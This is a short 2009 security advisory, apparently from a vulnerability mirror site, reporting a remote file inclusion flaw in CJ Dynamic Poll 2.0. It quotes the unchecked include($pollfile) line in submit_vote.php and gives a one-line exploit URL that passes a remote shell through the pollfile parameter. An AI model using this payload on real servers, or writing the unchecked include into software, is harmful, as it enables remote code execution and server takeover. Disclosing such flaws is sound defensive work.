Security Advisory: CJ Dynamic Poll 2.0 Remote File Inclusion Vulnerability

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  Atlantic SimpleCaddy Shopping Cart Price Manipulation

From: Cru3l.b0y <Cru3l.b0y_(at)_gmail.com>
Date: 12.07.2009
Subject: CJ Dynamic Poll 2.0 Remote File Inclusion Vulnerability

       ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
       +                                                                        +
       +        CJ Dynamic Poll 2.0 Remote File Inclusion Vulnerability     +
       +                                                                    +
       +                     Discovered by Cru3l.b0y                        +
       +                                                                    +
       +                      WwW.DeltaHacking.Net                          +
       +                                                                    +
       +                                                                    +
       +                                                                    +
       ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#################################################################################
##################
AUTHOR      : Cru3l.b0y
APPLICATION : CJ Dynamic Poll
VERSION     : 2.0
DOWNLOAD    : http://www.cj-design.com/dl/download/?file=19
VENDOR      : http://www.cj-design.com
#################################################################################
##################

Vulnerable Code :
#################################################################################
##################
/submit_vote.php



7    include($pollfile);




[+]Exploit: http://[t4rg3t]/[p4th]/submit_vote.php?pollfile=shell
#################################################################################
##################

test server